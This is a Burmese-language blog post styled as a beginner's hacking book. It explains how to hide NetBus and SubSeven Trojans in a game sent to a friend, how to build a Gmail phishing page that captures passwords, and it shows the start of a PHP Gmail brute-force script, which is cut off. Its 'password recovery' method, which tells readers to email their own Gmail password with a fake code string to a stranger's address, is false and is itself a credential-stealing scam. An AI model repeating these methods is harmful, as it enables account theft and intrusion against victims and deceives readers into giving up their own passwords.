Sunday, January 12, 2020

Happy New Year

Happy New Year 2020



Tuesday, April 2, 2019

✒️အေျခခံ Hacking နည္းပညာ စာအုပ္✒️

✒️{မာတိကာ}
Introduction: ဟက္ကာဆိုတာဘာလဲ ႏွင့္ ကြ်ႏ္ုပ္၏ အျမင္
အပိုင္း (၁) : လိုအပ္ေသာအရည္အျခင္းမ်ား
အပိုင္း (၂) : Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား
……….Intro
……….Trojan Horse ဟုေခၚေသာ virus အေၾကာင္း
…………ဟက္ကာေတအြ သုံးျပဳေသာ လွ်ိဳ႕၀ွက္ အရာမ်ား
………..Port Scanning
………..SubSeven
……….NetBus
အပိုင္း (၃) : Gmail Password Hack နည္း
…………..Phishing အေၾကာင္း Intro
အပိုင္း (၄) : Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း
အပိုင္း (၅) : Windows ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား
………. Registry သို့၀င္ေရာက္ေမႊေႏွာက္ျခင္း
……… Folder ကို software မသံုးပဲ lock ခ်နည္း ႏွင့္ Funny Command ေရးနည္း
……… Cmd Dos Command နည္းနည္းပါးပါး
……… Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
……… website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္


ဟက္ကာဆိုတာဘာလဲ ??? ကြ်ႏ္ုပ္၏အျမင္ ။
Hacking ပညာရပ္ဆိုသည္ သင္ယူလို႔ရေသာ ပညာမဟုတ္။ အသံုးခ် နည္းပညာမ်ားကို ေလ့လာေတြ႔ရွိျပီး
အားနည္းခ်က္ကို ရွာေဖြႏိုင္ေသာ ပညာျဖစ္သည္။ Online ေပၚတြင္ Hacking နဲ႔ပတ္သတ္ေသာ
စာအုပ္မ်ားစြာကိုေတြ႕ဘူးျပီး Hacking ႏွင့္ပတ္သတ္ေသာ web site မ်ားလဲ ေပၚထြက္ေနပါျပီ။ Vulnerability
ေပါင္းမ်ားစြာကို hacker ဟုေခၚေသာ လူစုမ်ားက ရွာေဖြေတြ႔ရွိျပီး web site ေပါင္းမ်ားစြာတြင္ တင္ထားၾကပါတယ္။ အဲဒီ
နည္းပညာရပ္ေတြကို အသံုးျပဳ မွီခို ေနတဲ့လူေတြအမ်ားႀကီးရွိပါတယ္။ ဒါေတြက ဟက္ကာေတြလားဆိုတဲ့
ေမးခြန္းေမးႏိုင္ပါတယ္။
Tool user ေတြပါ၊ professional hacker တစ္ေယာက္ဆိုတာ ပါရမီအရင္းခံျပီး ကြန္ပ်ဴတာ နည္းပညာ
ကိုရူးသြပ္တဲ့ လူတစ္ေယာက္ရဲ႕IT ပိုင္းဆိုင္ရာေပ်ာ့ကြက္ကို ရွာေတြ႔ႏိုင္ျခင္းျဖစ္ပါတယ္။ White, black, gray လို႔ေခၚတဲ့
hacker သံုးမ်ိဳးခြဲထားပါတယ္။ နဲ႔ black ကေတာ့ ရန္သူေတြေပါ့။ အမ်ားစုက gray ေတြပါ။
ဒါဆို က်ေနာ္ေရးထားတဲ့ စာအုပ္ကေကာ၊ ဖတ္ျပီး hacker တစ္ေယာက္ျဖစ္ႏိုင္ပါ့မလား
လို႔ေမးႏိုင္စရာအေၾကာင္းရွိပါတယ္။ က်ေနာ္ကိုယ္တိုင္ေတာင္မွ ဟက္ကာမဟုတ္တာဗ်။ :D ။ က်ေနာ္သိတာေလးေတကြ ို
share လုပ္ေပးခ်င္တဲ့ရည္ရြယ္ခ်က္ကို အဓိကထားတာပါ။


အပိုင္း (၁) လိုအပ္ေသာ အရည္အျခင္းမ်ား
hacking လုပ္သည့္ေနရာတြင္ တစ္ဦးတစ္ေယာက္လုပ္ျခင္းထက္ အ မ်ားႏွင့္
ပူေပါင္းျပီး လုပ္လွ်င္ ပုိျပီး အ က်ဳိးရွိသည္။ ထုိ႕ေၾကာင့္ Ethical hacking တြင္ Hacker
မ်ားစုဖြဲ႕ျပီး TEAM တစ္ခုအ ေနျဖင့္ လုပ္ေဆာင္ရသည္။ ၎တုိ႕သည္ အ ခ်ိန္တုိင္း မိမိ
ကုိင္တြယ္ရေသာ System အား လုိအ ပ္ခ်က္မ်ားကုိရွာေဖြျပင္ဆင္ရသည္။
တုိက္ခုိက္ျခင္းမ်ဳိးစုံ ရွိသည့္အ တြက္ အ ားလုံးကုိသိရွိရန္မွာမျဖစ္ႏူိင္ေပ။မိမိhacking
အ ဖြဲ႕တြင္ လုပ္ကုိင္ေသာသူမ်ားသည္ ေအာက္ေဖာ္ျပပါ ပညာရပ္မ်ားကုိ တစ္ဦး
တစ္ေယာက္ျခင္း အ ေသအ ခ်ာတတ္ေျမာက္ရန္လုိအပ္သည္။
· Programming
· Webdeveloping
· Software Crackers
· Web Hackers
· Network security groups
· system admin groups
· database Hackers
· crytoanalizer
၎ပညာရပ္မ်ား အားလုံးကုိ သိရွိရန္ မလုိေပ။ သုိ႕ေသာ္ general knowledge
သိရွိရမည္။ မိမိ Hacker အဖြဲ႕တြင္ လူတစ္ေယာက္စီ ပညာတစ္ခုစီကုိ
ေသေသခ်ာခ်ာတတ္ေျမာက္ရန္လိုအပ္သည္။
Hacker တစ္ေယာက္ေအာင္ျမင္စြာျပဳလုပ္ႏုိင္ရန္အတြက္လုိအပ္ခ်က္မ်ားစြာရွိသည္။
မိမိ ၀င္ေရာက္လုိေသာ ေနရာ၏ data အျပည့္အစုံကုိသိရွိေအာင္ အရင္ဆုံးျပဳလုပ္ရမည္။
IP address
မိမိ၀င္ေရာက္ရမည့္ Computer ၏ address
Hostname
မိမိ ၀င္ေရာက္ရမည့္ Computer ၏ နာမည္
Software
၎ Computer တြင္အသုံးျပဳေသာ Software မ်ား
Firewall rules
Network ၏ လုံျခဳံေရးအတြက္အသုံးျပဳထားသည္မ်ား
Phone Numbers
ဖုန္းနံပါတ္
Employee names
အလုပ္သမားမ်ား ၏ အေၾကာင္းအရာမ်ား
မိမိတုိ႕သိလုိေသာ အခ်က္မ်ားစြာကုိ Internet မွ မ်ားစြာအကူအညီေပးႏုိင္သည္။
သင ္hacking လုပ္လုိေသာ ေနရာ၏ data ၆၀% ကုိ internet မွရွာႏုိင္ပါသည္။
၎၏ company ႏွင့္ပတ္သက္ေသာ ဖုန္းနံပါတ္ ၊ IP address ၊ Firewall ၊ အလုပ္သမား
ဦးေရ ၊ company စတင္တည္ေထာင္ေသာေန႕ ၊ company ၏ ပုိင္ရွင္ အမည္မ်ား ၊
company ခ်ိတ္ဆက္ထားေသာ တျခားNetwork မ်ား၊ company ၏ထုတ္ ကုန္မ်ားစသည့္
သတင္းအခ်က္အလက္မ်ားကုိအက်ဳိးရွိရွိ အသုံးခ်ရမည္ျဖစ္သည္။
hacking ျပဳလုပ္ရန္အတြက္အသုံးျပဳေသာ Tools မ်ား
1. Google (အေၾကာင္းအရာမ်ားစြာကုိ ရွာႏုိင္သည္။)
2. Google Earth (Network ခ်ိတ္ဆက္ျခင္းမ်ားကုိ ၾကည့္ရႈရန္)
3. Nmap (IP addres မ်ားကုိၾကည့္ရႈရန္)
4. John The Ripper (Password မ်ားကုိေက်ာ္ႏုိင္ရန္)
5. Lan Guard (မိမိ၏ Network ကုိ ေစာင့္ၾကည့္ရန္)
6. Pwdump 6 (Password မ်ားကုိခ်ိန္းရန္)
7. Firebug (website မ်ားမွျပင္ၿပီး server ထဲသို႕၀င္ရန္)
8. Java ( Mysql ကုိျပင္ဆင္ရန္)
9. putty (တျခား Computer ထဲသုိ႕ ၀င္ေရာက္ရန္)
၎ တုိ႕ျဖင့္စတင္စမ္းသပ္ အသုံးျပဳၾကျပီး မိမိတုိ႕၏ ဥာဏ္ရည္ဥာဏ္ေသြးအရ
ဆက္လက္အေကာင္အထည္ေဖာ္ၾကည့္သင့္သည္။Tools မ်ား၏ အလုပ္လုပ္ပုံကုိ ေသခ်ာ နား
လည္မွသာ အသုံးျပဳႏုိင္မည္ျဖစ္သည္။Tools မ်ား၏ အားနည္းခ်က္မ်ားကုိ သိထားရမည္ ျဖစ္
သည္။ Tools မ်ားကုိသုံးလွ်င္ ၎တုိ႕၏ သုံးစြဲပုံ အေၾကာင္းကုိ ေသခ်ာဖတ္ၾကည့္ရမည္။


အပိုင္း (၂) Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား…

Intro
Trojan Horse
Hacking ရဲ႕အဓိက တရားခံလို႔ေျပာႏိုင္တာကေတာ့ Trojan ဆိုတဲ့ virus ေၾကာင့္ပါ။
အင္တာနက္ဆိုင္ေတြမွာ ေတြ႔ရတတ္တယ္ ။ USB Stick ေတြကို virus scan လုပ္လိုက္ရင္
ေတာ္ေတာ္မ်ားမ်ားေတြ႔ရတဲ့ virus တစ္မ်ိဳးေလ။ Trojan, Trojan နဲ႔ လူသိေတာ္ေတာ္မ်ားပါတယ္။
က်ေနာ္ေလ့လာလို႔သိရတာေတာ့ ကြန္ပ်ဴတာရဲ႕ အခ်က္အလက္ေတြ၊ password ေတြအခိုးခံရတာဟာ အဲဒီ
Trojan ေတြေၾကာင့္လို႔ သံသယျဖစ္မယ္ဆိုရင္ မမွားႏိုင္ပါဘူး။ Trojan ဆိုတာ program ေသးေသးေလးပါ။
အဲဒီ program ေလးက ကြန္ပ်ဴတာတစ္ခု ထဲမွာ ၀င္ေရာက္ေနရာယူကာ hacker ဆီသို႕ ၄င္းကြန္ပ်ဴတာ၏
information မ်ားကို သတင္းေပးႏိုင္ေသာ Program တစ္ခုပါ။ ၄င္း Trojan ျဖင့္ ကြန္ပ်ဴတာမ်ားကို
ထိန္းခ်ဳပ္ႏိုင္ပါသည္။
Trojan မ်ား၏ အမ်ားအားျဖင့္ လုပ္ေဆာင္ႏိုင္ေသာ အစြမ္းသတိၱမ်ားကို ေအာက္တြင္ေဖၚျပထားပါသည္။
.CD-Rom drive မ်ားကို အဖြင့္၊ အပိတ္ control လုပ္ႏိုင္ျခင္း
.သင္၏ ကြန္ပ်ဴတာမွ screenshot ကို capture လုပ္ႏိုင္ျခင္း
.သင္၏ password မ်ား ( Windows, MSN, Gmail, Yahoo,….အစသျဖင့္) ကို hacker ဆီသို႔ သတင္းပို႔ေပးႏိုင္ျခင္း
.သင္၏ hard disk ထဲမွ file မ်ားကို လိုသလို ကူးယူႏိုင္ျခင္း၊ delete လုပ္ႏိုင္ျခင္း
.Keyboard ႏွင့္ mouse ကို Disable လုပ္ႏိုင္ျခင္း……အစသျဖင့္
Popular ျဖစ္ေနေသာ Trojan မ်ား
-NetBus
-SubSeven
NetBus Trojan မွာ အျခား Trojan မ်ားကဲ့သို႕ အေရးႀကီးတဲ့ အစိတ္အပိုင္း ၂ ပိုင္း ရွိပါတယ္။ NetBus Server.exe ရယ္
Patch.exe ရယ္ဆို တဲ့ exe file ၂ ခု ပါ၀င္ပါတယ္။ NetBus Server ကို သင္၏ ကြန္ပ်ဴတာထဲသို႔ အရင္ဆံုး install
လုပ္ရန္လိုပါသည္။ Patch file ကို သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲသို႔ သြင္းႏိုင္ရန္ အဓိက လိုအပ္ပါသည္။
ဥပမာ- သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာ ပိုင္ရွင္၏ information ကိုအရင္ဆံုးစံုစမ္းသင့္ပါသည္။ သင္သည္
မိတ္ေဆြ သူငယ္ခ်င္းဆို လွ်င္ပို၍ အဆင္ေျပပါသည္။ ေရွးဦးစြာ သူ ၏ email သို႔ ပို႔၍ run
ခိုင္းျခင္းအားျဖင့္လဲ ရႏိုင္ပါသည္။ ဒါမွမဟုတ္ သူ႔အား ဂိမ္းလက္ေဆာင္ေပးသလိုလိုျဖင့္ ၄င္းဂိမ္းထဲတြင္
Patch file ကို သြင္းေပးလိုက္ပါ။ chess.exe file ဆိုပါစို႕။ ၄င္း exe file ထဲသို႔ Patch သြင္းလိုက္ပါ။
ResHacker software ျဖင့္ ဖန္တီးႏိုင္ပါသည္။ ထို႔ေနာက္ သင္ဖန္တီးလိုက္ေသာ chess.exe ဟာ
သာမန္အတိုင္းပါပဲ။ ဘာမွမေျပာင္းလဲသြားပါဘူး။ အဲဒီ ဟာကို install လုပ္လိုက္လွ်င္ ဂိမ္းဟာ သူ႔
orginal အတိုင္းပါပဲ။ ဘာမွ ျပႆနာမေပးႏိုင္ပါဘူး။ သင္ေပးလိုက္တဲ့ chess ထဲက patch file
ေလးက သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲတြင္ ေနရာယူျပီးသားျဖစ္ပါတယ္။ အဲဒီ file ကလဲ hidden
ျဖစ္ေနတာပါ။ အဲဒါဆို အဆင္ေျပသြားပါလိမ့္မယ္။ စ hack က်တာေပါ့။…..:D ။
ဟက္ကာေတြ အသံုးျပဳေသာ လွ်ိဳ႔၀ွက္ အရာမ်ား
(၁) Port Scanners
Port Scanner ဆိုတာဘာလ ဲ
Port Scanning ရဲ႕ အဓိက ရည္ရြယ္ခ်က္ကေတာ့ opening port ေတြကို ရွာဖို႕ျဖစ္ပါတယ္။ Hacker တစ္ေယာက္
အတြက္ အေျခခံက်တဲ့ နည္းတစ္ခုပါ။ opening port ေတြကိုသိမွ hack လို႔လြယ္မွာကိုး….။Hacker အေနနဲ႔ server ေပၚ
မွာလုပ္ေနတဲ့ service ေတြကို ၾကည့္ျခင္းအားျဖင့္ vulnerability ေတြကို ရွာႏိုင္ဖို႔ အခြင့္အလန္းပိုမ်ားလာမွာပါ။
နာမည္ႀကီးတဲ့ nmap port scan tool ကိုေဒါင္းလုတ္ခ်ဖို႔ link ပါ > http://nmap.org/download.html <
Online ေပၚမွာအျခားport scanner tool ေကာင္းေကာင္းေတြအမ်ားႀကီးရွိပါေသးတယ္….။
Start Scanning
Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrp)
Port Scanning ကို ၂ မ်ိဳးလုပ္ႏိုင္ပါတယ္။ ပထမတစ္ခုက Single IP port ဖြင့္ရန္အတြက္ႏွင့္ ဒုတိယတစ္ခုကို Range IP
Port ဖြင့္ရန္ျဖစ္ပါတယ္။ IP ဆိုတာက ေရွ႕ကဟာကတူျပီး အေနာက္က နံပါတ္ကေျပာင္းလဲသြားႏိုင္ပါတယ္။
ဥပမာ 192.168.1.2 , 192.168.1.3 အစသျဖင့္ေပါ့။ ဖုန္းနံပါတ္အတိုင္းပါပဲ (530-xxx) အစသျဖင့္……….
Range IP ဆိုတာက ေတာ့ ( 555-0000 to 555-9999) အထိ ၾကားထဲက မည္သည့္ဂဏန္းမဆို ျဖစ္ႏိုင္ပါတယ္။
Port Scanner ဆိုတာ ဒီလုိမ်ိဳးေပါ့
(၂) Trojan
Trojan အေၾကာင္းကေတာ့ Hacking မွာ မပါ မျဖစ္ကိုေတြ႔ရမွာပါ။ ဘာလို႔လဲဆိုေတာ့ Trojan ေတြက
ဟက္ကာေတြရဲ႕လက္စ ြဲ virus တစ္မ်ိဳးမို႔လို႔ပါ။ Trojan ေပါင္း တစ္ရာေက်ာ္နီးပါရိွပါတယ္။ အဲဒီထဲက
စံုတြဲ သေဘာလိုျဖစ္ေနေသာ Trojan အေၾကာင္း ဥပမာ အေနႏွင့္ေဖၚျပထားပါတယ္။ အဲဒီ Trojan ျဖင့္
က်ေနာ္ အခုလက္ရွိေမႊေနတယ္ေလ…..
Sub Seven
Sub Seven Trojan မွာ လုပ္ေဆာင္ႏိုင္တဲ့ စြမ္းရည္ အမ်ားအျပားရွိပါတယ္။ ၄င္း Trojan ဟာ က်ေနာ္ေတြ႔ဖူးသမွ်
Trojan ၁၀၀ေက်ာ္ေလာက္ထဲက အေကာင္းဆံုး လို႔ ယူဆပါတယ္။ ၄င္းရဲ႕လုပ္ေဆာင္ႏိုင္တဲ့စြမ္းရည္ေတြကို
ေအာက္မွာေဖၚျပထားပါတယ္။
SubSeven ဆိုတာ ဒီလိုမ်ိဳးပါ
လုပ္ေဆာင္ႏိုင္မွဳမ်ား
-address book
-www pager retriever
-UNI2IP
-remote IP scanner
-host lookup
-get WINDOWS CD-Key
-update victim from URL
-ICQ takeover
-FTP root folder
-retrieve dial-up passwords along with phone numbers and username
-port redirect
-IRC boot for a list of commands
-file manager bookmarks
-make folder, delete folder (Empty of Full)
-process manager
-text 2 speech
-Restart server
-Aol Instant Messenger Spy
-Yahoo Messenger Spy
-Microsoft Messenger Spy
-Retrieve list of ICQ uins and passwords
-App Redirect
-Edit files
- set/change screen saver settings
-Restart Windows
-IP Tools (Resolved Host name/ Ping IP address)
-Address
-City
-E-Mail
-Real name
-Country code
-Local Phone
-Zip code………….အစသျဖင့္ေပါ့…….. အျခားလုပ္ေဆာင္ႏိုင္မႈမ်ားစြာရွိပါေသးတယ္….။
NetBus
Net Bus ဆိုတာကေတာ့ ဟိုးအရင္တုန္းက သံုးခဲ့တဲ့ Trojan အေဟာင္းတစ္မ်ိဳးပါ။ ဒါေပမဲ့ ေတာ္ေတာ္
မ်ားမ်ားကေတာ့ ၄င္းကို ခုခ်ိန္ထိ သံုးစြဲလွ်က္ရွိၾကပါတယ္။ Net Bus နဲ႔ေမႊြရတာလဲေတာ္ေတာ္အဆင္ေျပပါတယ္။
စမ္းသံုးၾကည့္ေပါ့……..။ သံုးနည္းကို အေပၚတြင္ ေဖၚျပၿပီးပါၿပီ။
NetBus ကို ဤသို႔ေတြ႔ျမင္ရပါတယ္။
NetBus ၏ လုပ္ေဆာင္ႏိုင္စြမ္းမ်ားကို အထက္တြင္ ေဖၚျပထားပါသည္။ အေသးစိတ္ေတာ့ မေဖၚျပေတာ့ပါ။

အပိုင္း (၃) Gmail Password Hack နည္း

Gmail Password ကို Hack ရာတြင္ ဘာေတြလိုအပ္သနည္း ???
Hack နည္းေပါင္းမ်ားစြာရွိပါတယ္။ ေရွးဦးစြာ ရိုးရိုးရွင္းရွင္းျဖင့္ Hack ေသာနည္းလမ္းကို အရင္ေဖၚျပပါမည္။ လြန္ခဲ့တဲ့
၂၀၀၈ ခုႏွစ္ေလာက္တုန္းက javascript နည္းျဖင့္က်ေနာ္ သံုးၾကည့္ဖူးပါတယ္။ အခုေနာက္ပိုင္းထပ္သံုးၾကည့္တာ
မရေတာ့ပါဘူး၊ Google က admin ေတြကလဲ ငတံုးေတြမွမဟုတ္တာ။ သူတို႔ security ေတြကို
ခဏခဏျပန္ျပန္ျပင္တယ္ေလ။ က်ေနာ္တို႔ထက္အမ်ားႀကီးမွ အမ်ားႀကီးကိုလည္တာေပါ့။ ယခု နည္းက ေတာ့ Google ရဲ႕
security ေတြကို ျဖတ္ေက်ာ္လို႔ရတဲ့ javascript အသစ္တစ္ခုပါ။ က်ေနာ္ဤ နည္းကို ႏိုင္ငံျခား Hacking
စာအုပ္ထဲကေနု ဘာသာျပန္ထားတာပါ။ ၀ါသနာပါရင္ နည္းနည္းပါးပါးေလာက္ ၀င္ေမႊၾကည့္ၾကေပါ့
လုပ္နည္း
တစ္ဆင့္ျခင္းဆီေဖၚျပထားပါတယ္။
အဆင့္(၁) သင္၏ကိုယ္ပိုင္ Gmail account ျဖင့္ Gmail ထဲသို႔ Login ၀င္ပါ။
မွတ္ခ်က္ ( passwrdserver2@gmail.com သို႔အရင္ဆံုး add ထားပါ၊ add
ထားျပီးအနည္းဆံုးရက္ေပါင္း ၃၀ ျပည့္မွ ဤလုပ္နည္းသို႔စတင္လုပ္ႏိုင္မည္ျဖစ္သည္)
အဆင့္(၂) Login ၀င္ျပီးျပီးျခင္း compose mail လုပ္ပါ။To: ဆိုတဲ့ေနရာမွာ passwrdserver2@gmail.com
လို႔ေရးပါ။(passwrdserver2@gmail.com ဆိုတာ Google server မွ username ႏွင့္ password မ်ား ကို
မွတ္ထားေသာ ေနရာသို႔ mail ပို႔လိုက္ျခင္းျဖစ္ပါတယ္။ Automatic server ကေန သင့္ကို mail
တစ္ေဆာင္ျပန္ပို႔ပါလိမ့္မယ္။ ေစာင့္ေနပါ)
အဆင့္(၃) Subject: ဆိုတဲ့ ေနရာမွာ ‘’PASSWORD RECOVERY’’ ဆိုၿပီး တိတိက်က်ေရးပါ။
စာလံုးေပါင္းမမွားပါေစႏွင့္။ အေရးႀကီးပါတယ္။
အဆင့္(၄) mail ကိုစတင္ေရးႏိုင္ပါျပီ။ ပထမစာေၾကာင္းမွာ သင္ hack ခ်င္ေသာ သူ၏ account ကိုေရးပါ။
အဆင့္(၅) ဒုတိယစာေၾကာင္းမွာေတာ့ သင္ယခုလက္ရွိအသံုးျပဳေနေသာ gmail account ကိုေရးပါ။
အဆင့္(၆) တတိယေျမာက္စာေၾကာင္းမွာေတာ့ သင္၏ gmail password ကိုေရးပါ java script ျဖင့္ users
administrator server security ကိုျဖတ္ေက်ာ္ရာတြင္ verify လုပ္ရန္သင္၏ password ကိုလဲလိုပါတယ္။
အဆင့္(၇) ေနာက္ဆံုးအဆင့္နဲ႔ တကယ့္ကိုအေရးအႀကီးဆံုးအဆင့္ပါပဲဗ်ာ..။ ေအာက္မွာ က်ေနာ္ေဖၚျပထားတဲ့
code ကိုေသေသခ်ာခ်ာ ေကာ္ပီကူးပါ။
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
အားလံုး ready ျဖစ္ပါက send လို႔ရပါျပီ။ send လိုက္ပါေတာ့။
ဥပမာ- သင္၏ ကိုယ္ပိုင္ gmail account က myname@gmail.com ဆိုပါစို႔
သင္၏ password က 123456 လို႔မွတ္လိုက္ပါ။ သင္ hack ခ်င္ေသာ သူ၏
Gmail account ကေတာ့ test@gmail.com လို႔ထားလိုက္ပါ။က်ေနာ္ေအာက္မွ ေဖၚျပထားတဲ့အတိုင္း
mail တစ္ေဆာင္ေရးပါ။……..
To: ‘’gmail.com’’<passwrdserver2@gmail.com>
Bcc: , cc: ထိုေနရာမ်ားတြင္ ဘာမွ မေရးပါႏွင့္
Subject: ‘’PASSWORD RECOVERY’’
Text box ထဲတြင္ေရးရန္
test@gmail.com
myname@gmail.com
123456
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
System Reg လို႔ေခၚတဲ့ mail တစ္ေဆာင္ သင့္ဆီကို ၆ နာရီအတြင္း automatic ျပန္ပို႔ပါလိမ့္မယ္။ ထို mail
ထဲတြင္ သင္ hack လိုေသာသူ၏ information မ်ားအကုန္ပါလာမွာျဖစ္ပါတယ္။ စမ္းၾကည့္က်ပါ။ က်ေနာ့္ mail
ကိုေတာ့ မ hack နဲ႔ေနာ္ password ကို အလံုး ၆၀ ေပးထားလို႔ပါ…..ဟီး……ဟီး…..
Phishing
Phishing ႏွင့္ ပတ္သတ္ျပီး
က်ေနာ္ Phishing ဆိုတဲ့ အေၾကာင္းကို သိသေလာက္ နည္းနည္းေျပာခ်င္ပါတယ္။ တကယ္ေတာ့ အဲဒီ Phishing
ဆိုတာ လိမ္တဲ့ နည္းေလးတစ္ခုပါ။ သူမ်ားရဲ႕ Gmail account ပဲျဖစ္ျဖစ္၊ Yahoo account ပဲျဖစ္ျဖစ္၊ mediafire account
ပဲျဖစ္ျဖစ္ မည္သည့္ အေကာင့္ ကိုမဆို လိမ္ညာကာ password ယူလို႔ရေသာနည္းလမ္းျဖစ္ပါတယ္။ Phisher ဆုိတာ
ကြန္ပ်ဴတာ အသုံးၿပဳသူတုိ႔ရဲ႕ Data Information ေတြကုိရယူရန္ ၿပဳလုပ္ထား အတုအေရာင္စာမ်က္ႏွာ (a fake login
page) တစ္ခုသာလွ်င္ ၿဖစ္ပါတယ္။ fake login page ေတြက Computer user ေတြရဲ႕ user name and password
ေတြကုိ ဖုိင္တစ္ခုကေန၊ ဒါမွမဟုတ္ ေမးလ္ကုိ Direct ပုိ႔တဲ႔ နည္းလမ္းသုံးထားတာမ်ားပါတယ္... တစ္ခ်ဳိ႕ေတြက
က်ယ္က်ယ္ၿပန္႔ၿပန္႔သုံးၾကပါတယ္..
သ႔ရူ ဲ႕အလုပ္လုပ္ပုံက ရိုးရွင္းပါတယ္။ free host, free domain, code script ( မိမိ hack ခ်င္တဲ့ site ရဲ႕ code ပါ )
ျပီးရင္ setting အနည္းငယ္ေလး ၀င္ျပင္ျပီးရင္ Hack လို႔ရပါျပီ။
php enabled ထားတဲ႔ web hosting တစ္ခုလုိပါတယ္... Phishing Attacker ေတြကေတာ့ free ရတဲ႔ webhosting မွာ
account တစ္ခုဖြဲ႔ၿပီးသုံးေလ့ရွိပါတယ္...
မိမိအသုံးၿပဳတဲ႔ mail services, ဆုိၾကပါဆုိ Gmail
https://mail.google.com ကုိပဲသြားသြား, https://www.gmail.com ပဲ ၿဖစ္ၿဖစ္ ဖြင့္ကာ Ctrl + U သုိ႔မဟုတ္ Menu bar
မွာ view>Page Source ကိုသြားကာ အကုန္လုံးကုိ Copy ကူးၿပီး text editor or web editor .. example :
Dreamwaver ကဲ႔သုိ႔ Editor ထဲကုိ အကုန္လုံး paste လုပ္ယူလုိက္ပါ...
Code:
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post"
onSubmit="return(gaia_onLoginSubmit());">
ကုိ မိမိဖန္တီးထားတဲ႔ login page မွ data ေတြကုိ ရယူႏုိင္ေအာင္ သိမ္းဆည္းထားတဲ႔ login script file
ကုိလမ္းညြန္ေပးရပါတယ္..
ဥပမာ..
Code:
<form action="http://www.planetcreator.net/tutorial/Fake Login/login.php" method="post">
(login.php ဆုိတာက fake login page က User ရုိက္ထည့္လုိက္ေသာ user name and password ကုိရယူတာပါ)
အဲ႔လုိ ၿပင္ဆင္မူ႔ေတြလုပ္ၿပီး free hosting တစ္ခုမွာတင္...
user ကုိ နည္းမ်ဳိးစုံနဲ႔ မိမိရဲ႕ ေထာင္ေၿခာက္ထဲကုိ အေရာက္သြင္းၾကတာပါ..........
ဒါက Fake Login Page ေတြရဲ႕ နမူနာပါ။ တကယ္တမ္း fake login ေတြက ဒီေလာက္နဲ႔ မလုံေလာက္ပါဘူး... Phishing
Hacker ေတြက သူတုိ႔ရဲ႕ phisher ေတြကုိ နည္းလမ္းမ်ဳိးစုံနဲ႔ ၄င္းတုိ႔ရဲ႕ Victim ယုံၾကည္ေလာက္ေအာင္
ေသြးေဆာင္ၿဖားေယာင္း၊ ၿပီးေတာ့ attacker ဖန္တီးထားတဲ႔ page ကုိေရာက္ရင္ေတာင္မွ သာမာန္ user
တစ္ေယာက္အတြက္ လုံး၀ (လုံး၀) မသိေအာင္ address bar / mouse down function
ေတြကအစေပါ႔...စသည္..စသည္
၄င္း Fake Loign အားသြားေရာက္ စမ္းသပ္ရန္... စမ္းသပ္ရုံစမ္းသပ္ပါ... မိမိရဲ႕ gmail user name and password
ကုိေယာင္လုိ႔ေတာင္ ရုိက္မထည့္လုိက္နဲ႔.... လုံး၀ တာ၀န္မယူ။

အပိုင္း (၄) Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း

free host တခုခုမွာ ဒီကုဒ္ေတြကို သြင္းျပီး ဒါမွမဟုတ္ ကိုယ့္စက္ကို local host အေနနဲ႕ setting ခ်ျပီး
ဂ်ီေမးကိုေဖာက္လို႕ရပါျပီ။
<?php
//////////////////////
////Gmail-Brute//////
///////////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> -
<input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
</table>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imag
e/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
